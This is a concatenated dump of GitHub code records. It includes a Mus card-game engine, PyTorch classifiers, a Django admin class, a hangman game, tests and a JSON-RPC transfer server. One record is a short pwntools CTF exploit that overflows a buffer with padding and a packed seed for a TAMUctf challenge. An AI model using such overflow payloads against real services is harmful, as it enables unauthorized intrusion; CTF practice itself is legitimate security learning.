Axes(super().__add__(Axes(axes)))\n\n def __contains__(self, axes):\n axes = Axes(axes)\n axes = dict(zip(axes.labels, axes.counts))\n this = dict(zip(self.labels, self.counts))\n return all((axis in this for axis in axes)) and all(\n (\n len(count) <= len(this[axis])\n if count[-1] == \"+\"\n else count == this[axis]\n for axis, count in axes.items()\n )\n )\n\n @property\n def expand(self):\n axes = []\n for axis, count in zip(self.labels, self.counts):\n axes += [axis] * len(count)\n return tuple(axes)\n\n @property\n def must(self):\n axes = []\n for axis, count in zip(self.labels, self.counts):\n axes += [axis] * count.count(\"!\")\n return tuple(axes)\n\n @property\n def may(self):\n axes = []\n for axis, count in zip(self.labels, self.counts):\n axes += [axis] * count.count(\"+\")\n return tuple(axes)\n\n @property\n def labels(self):\n return tuple((self.get_label(axis) for axis in self))\n\n @property\n def counts(self):\n return tuple((self.get_count(axis) for axis in self))\n","repo_name":"Lyncs-API/lyncs","sub_path":"lyncs/field/types/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7284,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"43"} +{"seq_id":"1393259632","text":"from random import choice\n\nfrom player import Player, Human\nfrom apuesta import Apuesta\nimport logic\n\n\nclass MusGame:\n goal: int\n player1: Player\n player2: Player\n marcador: list[int, int]\n round: int\n\n def __init__(self, goal: int, p1: Player, p2: Player):\n self.goal = goal\n self.player1 = p1\n self.player2 = p2\n self.marcador = [0, 0]\n self.round = 0\n\n def is_finished(self) -> bool:\n return self.marcador[0] >= self.goal or self.marcador[1] >= self.goal\n\n def play(self):\n if isinstance(self.player1, Human) or isinstance(self.player2, Human):\n self.__run_game(imprimir=True)\n else:\n self.__run_game(imprimir=False)\n self.player1.imprimir = False\n self.player2.imprimir = False\n self.player1.goal = self.goal\n self.player2.goal = self.goal\n self.player1.marcador = self.marcador\n self.player2.marcador = self.marcador\n\n def __print_cartas(self):\n print(f\"cartas de {self.player1}: {self.player1.cartas}\")\n print(f\"cartas de {self.player2}: {self.player2.cartas}\")\n\n def __run_game(self, imprimir: bool):\n\n # Consideramos siempre al jugador 1 como humano\n if not isinstance(self.player1, Human):\n self.player1, self.player2 = self.player2, self.player1\n\n self.player2.goal = self.goal\n self.player2.marcador = self.marcador\n\n self.player1.preguntar_nombre()\n\n x = choice([0, 1])\n\n if imprimir:\n print(f\"{self.player1} VS {self.player2}\")\n print(\"Suerte!\")\n else:\n self.player1.imprimir = False\n self.player2.imprimir = False\n\n while not self.is_finished():\n\n if self.round % 2 == x:\n self.player1.mano = True\n self.player2.mano = False\n mano = 1\n if imprimir:\n print(f\"El mano es {self.player1}\")\n else:\n self.player1.mano = False\n self.player2.mano = True\n mano = 2\n if imprimir:\n print(f\"El mano es {self.player2}\")\n\n self.player1.cartas, self.player2.cartas = logic.repartir(2)\n if imprimir:\n print(\"Tus cartas son: \" + str(self.player1.cartas))\n\n # A grande:\n apuesta_grande = self._apostar(lance=1)\n if apuesta_grande.ganador == 1:\n self.marcador[0] += apuesta_grande.apuesta_previa\n if imprimir:\n print(f\"La puntuación de {self.player1} ha subido a: {self.marcador[0]}\")\n elif apuesta_grande.ganador == 2:\n self.marcador[1] += apuesta_grande.apuesta_previa\n if imprimir:\n 
print(f\"La puntuación de {self.player2} ha subido a: {self.marcador[1]}\")\n elif apuesta_grande.ordago:\n ganador = logic.gana_grande(self.player1.cartas, self.player2.cartas, mano)\n self.__print_cartas()\n if ganador == 1:\n self.marcador[0] = self.goal\n if imprimir:\n print(f\"La puntuación de {self.player1} ha subido a: {self.goal}\")\n else:\n self.marcador[1] = self.goal\n if imprimir:\n print(f\"La puntuación de {self.player2} ha subido a: {self.goal}\")\n break\n\n if self.is_finished():\n break\n\n # A chica:\n apuesta_chica = self._apostar(lance=2)\n if apuesta_chica.ganador == 1:\n self.marcador[0] += apuesta_chica.apuesta_previa\n if imprimir:\n print(f\"La puntuación de {self.player1} ha subido a: {self.marcador[0]}\")\n elif apuesta_chica.ganador == 2:\n self.marcador[1] += apuesta_chica.apuesta_previa\n if imprimir:\n print(f\"La puntuación de {self.player2} ha subido a: {self.marcador[1]}\")\n elif apuesta_chica.ordago:\n ganador = logic.gana_chica(self.player1.cartas, self.player2.cartas, mano)\n self.__print_cartas()\n if ganador == 1:\n self.marcador[0] = self.goal\n if imprimir:\n print(f\"La puntuación de {self.player1} ha subido a: {self.goal}\")\n else:\n self.marcador[1] = self.goal\n if imprimir:\n print(f\"La puntuación de {self.player2} ha subido a: {self.goal}\")\n break\n\n if self.is_finished():\n break\n\n # Conteo de tantos pendientes:\n # A grande:\n if apuesta_grande.ganador is None:\n ganador = logic.gana_grande(self.player1.cartas, self.player2.cartas, mano)\n if ganador == 1:\n self.marcador[0] += apuesta_grande.apuesta_total\n if imprimir:\n print(f\"La puntuación de {self.player1} ha subido a: {self.marcador[0]}\")\n elif ganador == 2:\n self.marcador[1] += apuesta_grande.apuesta_total\n if imprimir:\n print(f\"La puntuación de {self.player2} ha subido a: {self.marcador[1]}\")\n\n if self.is_finished():\n break\n\n if apuesta_chica.ganador is None:\n ganador = logic.gana_chica(self.player1.cartas, self.player2.cartas, mano)\n if ganador == 1:\n self.marcador[0] += apuesta_chica.apuesta_total\n if imprimir:\n print(f\"La puntuación de {self.player1} ha subido a: {self.marcador[0]}\")\n elif ganador == 2:\n self.marcador[1] += apuesta_chica.apuesta_total\n if imprimir:\n print(f\"La puntuación de {self.player2} ha subido a: {self.marcador[1]}\")\n\n if self.is_finished():\n if imprimir:\n self.__print_cartas()\n break\n\n if imprimir:\n print(f\"cartas de {self.player1}: {self.player1.cartas}\")\n print(f\"cartas de {self.player2}: {self.player2.cartas}\")\n print(f\"puntuación de {self.player1}: {self.marcador[0]}\")\n print(f\"puntuación de {self.player2}: {self.marcador[1]}\")\n print(\"\")\n\n self.round += 1\n\n if self.marcador[0] >= self.goal:\n print(f\"¡Ha ganado {self.player1}!\")\n else:\n print(f\"¡Ha ganado {self.player2}!\")\n\n def _apostar(self, lance: int, imprimir: bool = True) -> Apuesta:\n \"\"\"\n :lance: 1=grande, 2=chica, 3=pares, 4=juego (por ahora solo se puede jugar a grande y a chica)\n\n Es la función principal de las apuestas.\n Existen 3 posibles acciones: pasar, apostar, ordaguear. Se puede considerar el siguiente arbol de decisión:\n Opción 1, Pasar:\n pasar --> se acaba el bucle\n apuesta n --> continua el bucle... (Opción 3)\n órdago --> ordago() (Opción 2)\n Opción 2, Órdago:\n ordago()\n Opción 3, apuesta n:\n ver --> se acaba el bucle. (Queda pendiente)\n pasar --> se acaba el bucle. 
(El ganador se lleva la apuesta n previa o en su defecto 1)\n órdago --> ordago()\n apuesta n --> Se repite el bucle.\n \"\"\"\n if imprimir:\n if lance == 1:\n print(\"A GRANDE: \")\n elif lance == 2:\n print(\"A CHICA:\")\n elif lance == 3:\n print(\"A PARES:\")\n else:\n print(\"A JUEGO:\")\n\n apuesta = Apuesta()\n\n while not apuesta.acuerdo:\n if self.player1.mano:\n apuesta = self.player1.pedir_apuesta(apuesta, 1, lance)\n\n if apuesta.acuerdo and apuesta.n_acciones > 1:\n break\n\n apuesta = self.player2.pedir_apuesta(apuesta, 2, lance)\n else:\n apuesta = self.player2.pedir_apuesta(apuesta, 2, lance)\n\n if apuesta.acuerdo and apuesta.n_acciones > 1:\n break\n\n apuesta = self.player1.pedir_apuesta(apuesta, 1, lance)\n\n return apuesta\n","repo_name":"Pabloo22/Reinforcement-Learning","sub_path":"Monte Carlo Methods/mus (card game)/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":8524,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36470638963","text":"from pwn import *\nimport time\n\nbinary = args.BIN\n\ncontext.terminal = [\"tmux\", \"splitw\", \"-h\"]\ne = context.binary = ELF(binary)\nr = ROP(e)\n\ngs = '''\ncontinue\n'''\n\ndef start():\n if args.GDB:\n return gdb.debug(e.path, gdbscript=gs)\n elif args.REMOTE:\n return remote(\"tamuctf.com\", 443, ssl=True, sni=\"lucky\")\n else:\n return process(e.path)\n\np = start()\n\npad = b'A'*12\nseed = p64(5649426)\n\np.sendline(pad+seed)\np.interactive()\n\n\n\n","repo_name":"tj-oconnor/ctf-writeups","sub_path":"tamu_ctf/lucky/pwn-lucky.py","file_name":"pwn-lucky.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"43"} +{"seq_id":"71433441090","text":"#WikiScrape\n\nimport csv\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nhtml = urlopen(\"https://en.wikipedia.org/wiki/Deep_learning\")\n\nsoup = BeautifulSoup(html, features=\"lxml\")\n\n#Title\ntitle = soup.find(id=\"firstHeading\")\n\n#Body\nmain_body = soup.findAll('p')\nmain_body = soup.p.prettify()\n\n\n\n#print(main_body)\n\ncsvfile = open('wiki.csv', 'a')\nwriter = csv.writer(csvfile)\ndata_0 = (title)\ndata_1 = (main_body)\nwriter.writerow(data_0)\nwriter.writerow(data_1)\n\n#body\n #content\n #div id = mw-content-text\n #div class = mw-content-text\n #

    \n \n\n\n\n\n\n\n","repo_name":"Bhaney44/Scrapers","sub_path":"Stack_1d.py","file_name":"Stack_1d.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24206864401","text":"import random\r\n\r\ndef jogar():\r\n print(\"JOGO DA FORCA\")\r\n\r\n palavra_secreta=carrega_palavra_secreta()\r\n letras_acertadas = inicializa_letras_acertadas(palavra_secreta)\r\n\r\n enforcou = False\r\n acertou=False\r\n tentativas=0\r\n \r\n print(letras_acertadas)\r\n \r\n while(not acertou and not enforcou):\r\n chute = pede_chute()\r\n if (chute in palavra_secreta):\r\n marca_chute_correto(chute, letras_acertadas, palavra_secreta)\r\n else:\r\n tentativas=tentativas+1\r\n print(letras_acertadas)\r\n enforcou = tentativas == 10\r\n acertou = \"_\" not in letras_acertadas\r\n\r\n if (acertou):\r\n print(\"Você ganhou! Parabéns!\")\r\n else:\r\n print(\"Você perdeu.\")\r\n print(\"A palavra era {}\".format(palavra_secreta))\r\n\r\ndef carrega_palavra_secreta():\r\n arquivo = open(\"palavras.txt\", \"r\")\r\n palavras = []\r\n for linha in arquivo:\r\n linha = linha.strip()\r\n palavras.append(linha)\r\n arquivo.close()\r\n numero = random.randrange(0, len(palavras))\r\n palavra_secreta = palavras[numero].lower()\r\n return palavra_secreta\r\n\r\ndef inicializa_letras_acertadas(palavra):\r\n return [\"_\" for letra in palavra]\r\n\r\ndef pede_chute():\r\n chute = input(\"Qual letra? \")\r\n chute = chute.strip()\r\n chute=chute.lower()\r\n return chute\r\n\r\ndef marca_chute_correto(chute, letras_acertadas, palavra_secreta):\r\n posicao = 0\r\n for letra in palavra_secreta:\r\n if (chute == letra):\r\n letras_acertadas[posicao] = letra\r\n posicao += 1\r\n\r\nif (__name__ == \"__main__\"):\r\n jogar()\r\n\r\n","repo_name":"ruhangon/cursos-online-python","sub_path":"parte 2/jogos/forca.py","file_name":"forca.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11807511242","text":"class Solution(object):\n def twoSum(self, nums, target):\n # declaration of the dictionary\n seen = {}\n for i in range(0, len(nums)):\n value = nums[i]\n remaining = target - value\n # we find the remaining element in the dictionary\n if remaining in seen:\n return [i, seen[remaining]]\n # we add nums[i] as the key and its index as the value in the dictionary\n seen[value]=i\n","repo_name":"bdub-dev/Coding-Problems","sub_path":"1-two-sum/1-two-sum.py","file_name":"1-two-sum.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36179338947","text":"from django.contrib import admin\n\nfrom src.core.utils import get_link_to_admin_form_for_object\nfrom ..models import KarmaBoard\n\n\n@admin.register(KarmaBoard)\nclass KarmaBoardAdmin(admin.ModelAdmin):\n list_display = [\n \"id\",\n \"owner_link\",\n \"name\",\n \"value_step\",\n \"unsplash_photo_link\",\n \"modified_at\",\n \"created_at\",\n ]\n list_display_links = list_display\n ordering = [\"-created_at\"]\n search_fields = [\"id\", \"name\", \"karmaboarduser__user__username\"]\n date_hierarchy = \"modified_at\"\n list_filter = [\"karmaboarduser__user__is_demo\"]\n\n fieldsets = [\n [\n \"None\",\n {\n \"fields\": [\n \"id\",\n \"name\",\n \"value_step\",\n \"unsplash_photo\",\n ]\n },\n ],\n [\"Dates\", {\"fields\": [\"modified_at\", \"created_at\"]}],\n ]\n readonly_fields = 
[\"id\", \"modified_at\", \"created_at\"]\n\n def owner_link(self, karmaboard: KarmaBoard) -> str:\n return get_link_to_admin_form_for_object(\n obj=karmaboard.owner,\n inner_html=karmaboard.owner.username,\n )\n\n owner_link.short_description = \"Owner\"\n\n def unsplash_photo_link(self, karmaboard: KarmaBoard) -> str:\n return get_link_to_admin_form_for_object(\n obj=karmaboard.unsplash_photo,\n inner_html=karmaboard.unsplash_photo.id,\n )\n\n unsplash_photo_link.short_description = \"Unsplash Photo\"\n unsplash_photo_link.admin_order_field = \"unsplash_photo__id\"\n","repo_name":"CapedHero/karmaspace-backend","sub_path":"src/karmaspace/admin/karmaboard.py","file_name":"karmaboard.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"29327567350","text":"import urllib.request\nimport json\n\nappid = ''\nwith open('weather.json','r') as f:\n appid = json.loads(f.read())['appid']\nurl = 'http://api.openweathermap.org/data/2.5/weather?q=London'+'&appid='+appid\n\nwith urllib.request.urlopen(url) as response:\n html = response.read()\n print(json.loads(html))\n","repo_name":"ellinx/scratch","sub_path":"python/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"28286351620","text":"import pytest\r\nimport time\r\nimport sys\r\nfrom os.path import dirname, abspath\r\nfrom page_obj.scg.scg_def import *\r\nfrom page_obj.scg.scg_def_dhcp import *\r\nfrom page_obj.scg.scg_def_log import *\r\nfrom page_obj.scg.scg_def_mac import *\r\nfrom page_obj.common.rail import *\r\nfrom page_obj.common.telnet import *\r\nfrom page_obj.common.ssh import *\r\nsys.path.insert(0, dirname(dirname(abspath(__file__))))\r\n\r\ntest_id = \"139592\"\r\n\r\n\r\ndef test_c139592(browser):\r\n\r\n\ttry:\r\n\t\tresult1 = get_dut_interface_mac_jyl(dut_name=dev2, interface=interface_name_1).lower()\r\n\t\tprint(result1)\r\n\t\tshell_cmd = Shell_SSH()\r\n\t\tshell_cmd.connect(hostip=dev2)\r\n\t\tshell_cmd.ping_cmd(ipadd=dev3)\r\n\t\ttime.sleep(2)\r\n\t\tshell_cmd.close()\r\n\t\tlogin_web(browser, url=dev3)\r\n\t\t# arp_list = get_dynamic_arp_all(browser)\r\n\t\t# print(arp_list)\r\n\t\tset_arp_dyn_to_static(browser, ipadd=dev2)\r\n\t\tarp_list_static = get_static_arp_all(browser)\r\n\t\tdel_static_arp(browser)\r\n\t\ttry:\r\n\t\t\tassert [dev2, result1, interface_name_1, ''] in arp_list_static\r\n\t\t\trail_pass(test_run_id, test_id)\r\n\r\n\t\texcept Exception as err1:\r\n\t\t\tprint(err1)\r\n\t\t\trail_fail(test_run_id, test_id)\r\n\t\t\tassert [dev2, result1, interface_name_1, ''] in arp_list_static\r\n\r\n\r\n\texcept Exception as err:\r\n\t\t# 如果上面的步骤有报错,重新设备,恢复配置\r\n\t\tprint(err)\r\n\t\trail_fail(test_run_id, test_id)\r\n\t\treload(hostip=[dev3, dev2])\r\n\t\tassert False\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\tpytest.main([\"-v\", \"-s\", \"test_c\" + test_id + \".py\"])","repo_name":"lizhuoya1111/Automated_testing_practice","sub_path":"pyautoTest-master(ICF-7.5.0)/test_case/scg/scg_ARP/test_c139592.py","file_name":"test_c139592.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24191886479","text":"from datetime import datetime\nfrom test.utils import TestUtils\n\nimport numpy as np\n\nfrom src.biota_models.vegetation.output.veg_output_model import (\n 
VegetationHisOutput,\n VegetationMapOutput,\n VegetationOutputParameters,\n _VegetationOutput,\n)\nfrom src.core.output.base_output_model import BaseOutput\nfrom src.core.output.output_protocol import OutputProtocol\n\n\nclass TestVegetationOutputParameters:\n def test_init_modelattributes(self):\n test_params = VegetationOutputParameters()\n assert test_params.hydro_mor is True\n assert test_params.veg_characteristics is True\n assert test_params.valid_output()\n\n\nclass TestCoralMapOutput:\n def test_init_mapoutput(self):\n test_dir = TestUtils.get_local_test_data_dir(\"BaseOutput\")\n xy_array = np.array([[0, 1], [1, 0]], np.float64)\n test_map_output = VegetationMapOutput(\n output_dir=test_dir, xy_coordinates=xy_array, first_year=2021\n )\n assert isinstance(test_map_output, OutputProtocol)\n assert isinstance(test_map_output, _VegetationOutput)\n assert isinstance(test_map_output, BaseOutput)\n assert isinstance(test_map_output.output_params, VegetationOutputParameters)\n\n assert test_map_output.output_filepath == test_dir / \"VegModel_map.nc\"\n assert (test_map_output.xy_coordinates == xy_array).all()\n assert test_map_output.first_year == 2021\n assert test_map_output.space == len(xy_array)\n\n\nclass TestVegetationHisOutput:\n def test_init_mapoutput(self):\n test_dir = TestUtils.get_local_test_data_dir(\"BaseOutput\")\n xy_array = np.array([[0, 1], [1, 0]], np.float64)\n idx_array = np.array([[1, 0], [0, 1]], np.float64)\n first_date = datetime.now()\n test_his_output = VegetationHisOutput(\n output_dir=test_dir,\n xy_stations=xy_array,\n idx_stations=idx_array,\n first_date=first_date,\n )\n assert isinstance(test_his_output, OutputProtocol)\n assert isinstance(test_his_output, _VegetationOutput)\n assert isinstance(test_his_output, BaseOutput)\n assert isinstance(test_his_output.output_params, VegetationOutputParameters)\n assert test_his_output.output_filepath == test_dir / \"VegModel_his.nc\"\n assert (test_his_output.xy_stations == xy_array).all()\n assert (test_his_output.idx_stations == idx_array).all()\n assert test_his_output.first_date == first_date\n","repo_name":"Deltares/NBSDynamics","sub_path":"test/biota_models/vegetation/output/test_veg_output_model.py","file_name":"test_veg_output_model.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"43"} +{"seq_id":"5074476245","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass CNN(nn.Module):\n def __init__(self, in_len, input_dim=9, output_dim=3):\n \"\"\"Pytorch 1D CNN model for time series classification. 
Model architecture from:\n Ye Yuan, et al., A general end-to-end diagnosis framework for manufacturing systems, National Science Review, Volume 7, Issue 2, February 2020, Pages 418–429, https://doi.org/10.1093/nsr/nwz190 \n \n Arguments:\n in_len : int\n length of time sequence\n input_dim : int\n number of channels (sensor time sequences)\n output_dim : int\n number of classification labels \n \"\"\"\n super(CNN, self).__init__()\n self.in_len = in_len\n self.input_dim = input_dim\n self.output_dim = output_dim\n \n self.conv_block = nn.Sequential(\n nn.Conv1d(self.input_dim, 64, 10, 5),\n nn.BatchNorm1d(64),\n nn.ReLU(inplace=True),\n nn.MaxPool1d(2),\n nn.Conv1d(64, 64, 2),\n nn.BatchNorm1d(64),\n nn.ReLU(inplace=True),\n nn.MaxPool1d(2)\n )\n self.fc_block = nn.Sequential(\n nn.Linear(self.fc_len(), 500), # calculate input dimension adaptively\n nn.BatchNorm1d(500),\n nn.ReLU(inplace=True),\n nn.Linear(500, 50),\n nn.ReLU(inplace=True)\n )\n self.classifier = nn.Linear(50, self.output_dim)\n\n def forward(self, x):\n \"\"\"Forward pass of model network \n \n Inputs:\n x: pytorch tensor (batch, channels, sequence)\n batch of input data\n \n Outputs:\n x: pytorch tensor (batch, labels)\n batch of labels\n \"\"\"\n x = self.conv_block(x)\n x = x.view(x.size(0), -1)\n x = self.fc_block(x)\n x = self.classifier(x)\n return x\n \n def out_len_conv(self, in_len, conv_layer):\n \"\"\"Calculate output length of 1D conv layer \n \n Inputs:\n in_len: int\n input dimension of conv layer\n conv_layer: object\n pytorch conv1d \n \n Outputs:\n out_len: int\n output dimension of conv layer\n \"\"\"\n out_len = (in_len-conv_layer.kernel_size[0]+2*conv_layer.padding[0])/conv_layer.stride[0]+1\n return out_len\n\n def fc_len(self):\n \"\"\"Calculate output length of conv_block for linear layer connection \n \"\"\"\n out = self.out_len_conv(self.in_len, self.conv_block[0])\n out = int(out/2)\n out = self.out_len_conv(out, self.conv_block[4]) \n out = int(out/2)\n out = out*self.conv_block[4].out_channels\n return out\n \n\nclass LSTM(nn.Module):\n def __init__(self, input_dim, hidden_dim=20, num_layers=2, output_dim=1):\n \"\"\"Pytorch vanilla LSTM model for time series classification \n \n Arguments:\n input_dim : int\n number of channels (sensor time sequences) \n hidden_dim : int\n hidden layer size\n num_layers : int\n number of layers in LSTM block\n output_dim : int\n number of classification labels \n \"\"\"\n super(LSTM, self).__init__()\n self.input_dim = input_dim\n self.hidden_dim = hidden_dim\n self.num_layers = num_layers\n self.output_dim = output_dim\n\n self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers)\n \n self.fc_block = nn.Sequential(\n nn.Linear(self.hidden_dim, self.hidden_dim),\n nn.BatchNorm1d(self.hidden_dim),\n nn.ReLU(inplace=True),\n nn.Linear(self.hidden_dim, self.hidden_dim),\n nn.BatchNorm1d(self.hidden_dim),\n nn.ReLU(inplace=True),\n ) \n self.classifier = nn.Linear(self.hidden_dim, self.output_dim)\n\n def forward(self, input):\n \"\"\"Forward pass of model network \n \n Inputs:\n input: pytorch tensor (batch, channels, sequence)\n batch of input data\n \n Outputs:\n out: pytorch tensor (batch, labels)\n batch of labels\n \"\"\"\n out, hidden = self.lstm(input.permute(2,0,1)) # (batch, channels, sequence) -> [sequence, batch, channels]\n out = self.fc_block(out[-1])\n out = self.classifier(out)\n return out\n\n\nclass LSTMattn(nn.Module):\n \"\"\"Pytorch LSTM model with attention for time series classification. 
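 The fc_len/out_len_conv pair above just chains the standard conv-length formula, L_out = (L_in - k + 2p)/s + 1, with the two pooling halvings. A worked instance of that arithmetic for an assumed in_len of 400: in_len = 400 # assumed example sequence length L1 = (in_len - 10) / 5 + 1 # Conv1d(kernel=10, stride=5, pad=0) -> 79.0 L1 = int(L1 / 2) # MaxPool1d(2) -> 39 L2 = (L1 - 2) / 1 + 1 # Conv1d(kernel=2, stride=1, pad=0) -> 38.0 L2 = int(L2 / 2) # MaxPool1d(2) -> 19 print(L2 * 64) # 19 positions x 64 channels = 1216 inputs to the first Linear 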
\n Attention model from:\n M.Luong et al, Effective Approaches to Attention-based Neural Machine Translation, 2015, arXiv:1508.04025\n Implementation from:\n https://github.com/prakashpandey9/Text-Classification-Pytorch\n https://github.com/spro/practical-pytorch/tree/master/seq2seq-translation \n \n Arguments:\n input_dim : int\n number of channels (sensor time sequences) \n hidden_dim : int\n hidden layer size\n num_layers : int\n number of layers in LSTM block\n output_dim : int\n number of classification labels \n \"\"\"\n def __init__(self, input_dim, hidden_dim, num_layers=2, output_dim=1):\n super(LSTMattn, self).__init__()\n self.input_dim = input_dim\n self.hidden_dim = hidden_dim\n self.num_layers = num_layers\n self.output_dim = output_dim\n\n self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, dropout=0.8)\n self.fc_block = nn.Sequential(\n nn.Linear(self.hidden_dim, self.hidden_dim),\n nn.BatchNorm1d(self.hidden_dim),\n nn.ReLU(inplace=True)\n ) \n self.concat = nn.Linear(self.hidden_dim * 2, self.hidden_dim) \n self.classifier = nn.Linear(self.hidden_dim, self.output_dim)\n \n def attention(self, lstm_output, hidden):\n \"\"\"Luong attention model for sequence classification \n \n Inputs:\n lstm_output: pytorch tensor (sequence, batch, hidden)\n output of LSTM \n hidden: pytorch tensor (batch, hidden)\n hidden state of LSTM\n \n Outputs:\n output: pytorch tensor (batch, hidden)\n hidden state with applied attention\n \"\"\"\n hidden = hidden.squeeze(0)\n lstm_output = lstm_output.permute(1,0,2)\n\n scores = torch.bmm(lstm_output, hidden.unsqueeze(2))\n attn_weights = F.softmax(scores, 1) # eq.7 \n context = torch.bmm(lstm_output.transpose(1, 2), attn_weights).squeeze(2)\n \n concat_input = torch.cat((hidden, context), 1)\n output = torch.tanh(self.concat(concat_input)) # eq. 5\n \n return output\n\n def forward(self, input):\n \"\"\"Forward pass of model network \n \n Inputs:\n input: pytorch tensor (batch, channels, sequence)\n batch of input data\n \n Outputs:\n out: pytorch tensor (batch, labels)\n batch of labels\n \"\"\"\n input = input.permute(2,0,1)\n lstm_out, (h,c) = self.lstm(input)\n out = self.attention(lstm_out, h[-1])\n out = self.classifier(out)\n \n return out\n \n\nclass MultiClassifier(nn.Module):\n \"\"\"Pytorch multi task classifier block for pump maintenance dataset. 
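 The attention() method above is easiest to follow by tracking tensor shapes. A self-contained trace of the same eq. 7 / eq. 5 tensor algebra, with arbitrary example dimensions and no model weights involved: import torch import torch.nn.functional as F seq, batch, hidden = 7, 4, 16 lstm_output = torch.randn(seq, batch, hidden) # what nn.LSTM emits: (seq, batch, hidden) h = torch.randn(batch, hidden) # last hidden state, already squeezed out = lstm_output.permute(1, 0, 2) # (batch, seq, hidden) scores = torch.bmm(out, h.unsqueeze(2)) # (batch, seq, 1) dot-product scores weights = F.softmax(scores, 1) # normalised over the seq axis (eq. 7) context = torch.bmm(out.transpose(1, 2), weights) # (batch, hidden, 1) weighted sum assert context.squeeze(2).shape == (batch, hidden) # ready for the concat + tanh (eq. 5) 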
\n See:\n https://discuss.pytorch.org/t/how-to-do-multi-task-training/14879/7\n https://discuss.pytorch.org/t/how-to-learn-the-weights-between-two-losses/39681/2\n \"\"\"\n def __init__(self, input_dim):\n super(MultiClassifier, self).__init__()\n self.fc_0 = nn.Linear(input_dim, 3)\n self.fc_1 = nn.Linear(input_dim, 4)\n self.fc_2 = nn.Linear(input_dim, 3)\n self.fc_3 = nn.Linear(input_dim, 4)\n\n def forward(self, x):\n x_0 = self.fc_0(x)\n x_1 = self.fc_1(x)\n x_2 = self.fc_2(x)\n x_3 = self.fc_3(x)\n \n return x_0, x_1, x_2, x_3","repo_name":"France1/predictive-maintenance-pytorch","sub_path":"model/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":8171,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"43"} +{"seq_id":"17427338101","text":"# -*- coding:utf-8 -*-\r\n\r\nimport asyncio\r\nfrom aiohttp import web\r\nfrom .asyncrpc import AsyncRPC\r\nfrom .transfer import Transfer\r\nfrom .sysconfig import SysConfig\r\nfrom jsonrpcserver.aio import methods\r\n\r\n@methods.add\r\nasync def account(context):\r\n ''' 账户信息\r\n '''\r\n return SysConfig().account\r\n\r\n@methods.add\r\nasync def get_balances(context):\r\n ''' 获取余额\r\n '''\r\n result = []\r\n client = context['client']\r\n server = context['server']\r\n balances = await client.get_named_account_balances(SysConfig().account, [])\r\n for asset in balances:\r\n asset_info = await server.get_asset_info(client, asset['asset_id'])\r\n result.append({\r\n 'id': asset_info['id'],\r\n 'symbol': asset_info['symbol'],\r\n 'amount': str(float(asset['amount'])/float(10**int(asset_info['precision'])))\r\n })\r\n return result\r\n\r\n@methods.add\r\nasync def transfer(to, symbol_or_id, amount, memo, context):\r\n ''' 资产转账\r\n '''\r\n client = context['client']\r\n server = context['server']\r\n account = await server.account_info(client)\r\n asset = await server.get_asset_info(client, symbol_or_id)\r\n transfer = Transfer(client, account)\r\n return await transfer.send_to(to, asset, float(amount), memo)\r\n\r\n@methods.add\r\nasync def get_transfer_fees(symbols_or_ids : list, context):\r\n ''' 获取转账手续费\r\n '''\r\n assets = []\r\n client = context['client']\r\n server = context['server']\r\n for asset in symbols_or_ids:\r\n assets.append(await server.get_asset_info(client, asset))\r\n return await server.calcul_transfer_fees(client, assets)\r\n\r\nclass RpcServer(object):\r\n ''' json-rpc服务\r\n '''\r\n asset_info = {}\r\n\r\n def __init__(self, loop=None):\r\n self._loop = loop\r\n if self._loop is None:\r\n self._loop = asyncio.get_event_loop()\r\n self._started = False\r\n self._account_info = None\r\n\r\n def listen(self, host, port):\r\n ''' 监听服务\r\n '''\r\n if not self._started:\r\n app = web.Application(loop=self._loop)\r\n app.router.add_post('/', self._handle)\r\n self._loop.run_until_complete(\r\n self._loop.create_server(app.make_handler(), host, port))\r\n self._started = True\r\n\r\n async def account_info(self, client):\r\n if self._account_info is None:\r\n self._account_info = await client.get_account_by_name(SysConfig().account)\r\n return self._account_info\r\n\r\n async def get_asset_info(self, client, symbol_or_id):\r\n ''' 获取资产信息\r\n '''\r\n if symbol_or_id not in self.asset_info:\r\n asset = (await client.lookup_asset_symbols([symbol_or_id]))[0]\r\n self.asset_info[asset['id']] = asset\r\n self.asset_info[asset['symbol']] = asset\r\n return self.asset_info[symbol_or_id]\r\n\r\n\r\n async def get_transfer_fee(self, client):\r\n ''' 获取转账费用\r\n '''\r\n obj = (await 
